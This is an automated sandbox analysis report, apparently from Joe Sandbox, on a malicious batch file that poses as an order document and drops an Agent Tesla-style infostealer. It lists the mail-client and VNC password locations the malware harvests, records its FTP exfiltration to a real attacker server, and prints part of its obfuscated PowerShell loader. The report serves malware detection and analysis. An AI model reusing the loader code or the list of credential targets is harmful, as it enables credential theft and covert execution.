                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTP Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Mail App
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SchemaId
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pResourceElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pIdentityElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pPackageSid
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pAuthenticatorElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: syncpassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: mailoutgoing
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FoxMail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Executable
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FoxmailPath
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Storage\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Storage\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Accounts\Account.rec0
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Accounts\Account.rec0
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Account.stg
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Account.stg
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: POP3Host
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTPHost
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IncomingServer
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Account
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: MailAddress
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: POP3Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Opera Mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: opera:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PocoMail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: appdata
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Pocomail\accounts.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: POPPass
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTPPass
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: eM Client
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: eM Client\accounts.dat
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: eM Client
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Accounts
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: "Username":"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: "Secret":"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: "ProviderName":"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: o6806642kbM7c5
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Mailbird
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SenderIdentities
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Accounts
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Mailbird\Store\Store.db
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Server_Host
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Accounts
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Username
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: EncryptedPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Mailbird
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: RealVNC 4.x
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: RealVNC 3.x
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: RealVNC 4.x
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: RealVNC 3.x
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\ORL\WinVNC3
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: TightVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\TightVNC\Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: TightVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\TightVNC\Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PasswordViewOnly
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: TightVNC ControlPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\TightVNC\Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ControlPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: TigerVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\TigerVNC\Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles(x86)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles(x86)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd2
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd2
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd2
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles(x86)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passwd
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UltraVNC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles(x86)
                            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49720 version: TLS 1.2

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49722 -> 136.243.131.47:60398
                            Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49721 -> 136.243.131.47:21
                            Source: global trafficTCP traffic: 192.168.2.5:49722 -> 136.243.131.47:60398
                            Source: Joe Sandbox ViewIP Address: 136.243.131.47 136.243.131.47
                            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownFTP traffic detected: 136.243.131.47:21 -> 192.168.2.5:49721 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: ftp.hitplas.ro
                            Source: powershell.exe, 00000004.00000002.3794927751.0000000008F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                            Source: powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: powershell.exe, 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.hitplas.ro
                            Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                            Source: powershell.exe, 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                            Source: powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/x
                            Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49720 version: TLS 1.2

                            System Summary

                            barindex
                            Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07220FA04_2_07220FA0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E009C84_2_09E009C8
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E012884_2_09E01288
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E002384_2_09E00238
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E064C14_2_09E064C1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E074984_2_09E07498
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E0E6204_2_09E0E620
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E5E2F84_2_09E5E2F8
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E5CA904_2_09E5CA90
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E500404_2_09E50040
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E52C8C4_2_09E52C8C
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_09E546C84_2_09E546C8
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07220F814_2_07220F81
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722298C4_2_0722298C
                            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7332
                            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7332Jump to behavior
                            Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@7/9@2/2
                            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8600:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8544:120:WilError_03
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmcjcy2t.5cx.ps1Jump to behavior
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" "
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$impmx.CopyTo($wcpem);$impmx.Dispose();$iditr.Dispose();$wcpem.Dispose();$wcpem.ToArray();}function cojht($param_var,$param2_var){$bmqix=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$asawf=$bmqix.EntryPoint;$asawf.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $qcgkm;$zjhkb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgkm).Split([Environment]::NewLine);foreach ($ypota in $zjhkb) {if ($ypota.StartsWith(':: ')){$rlowp=$ypota.Substring(3);break;}}$poyjn=[string[]]$rlowp.Split('\');$cjyyk=uxwbr (jyvtg ([Convert]::FromBase64String($poyjn[0])));$rxcxl=uxwbr (jyvtg ([Convert]::FromBase64String($poyjn[1])));cojht $cjyyk $null;cojht $rxcxl (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recycleb
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                            Source: powershell.exe, 00000004.00000002.3794927751.0000000008FA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: order no_3_17_2025 ref_HR 6473876476374647464657464564764746.batVirustotal: Detection: 8%
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
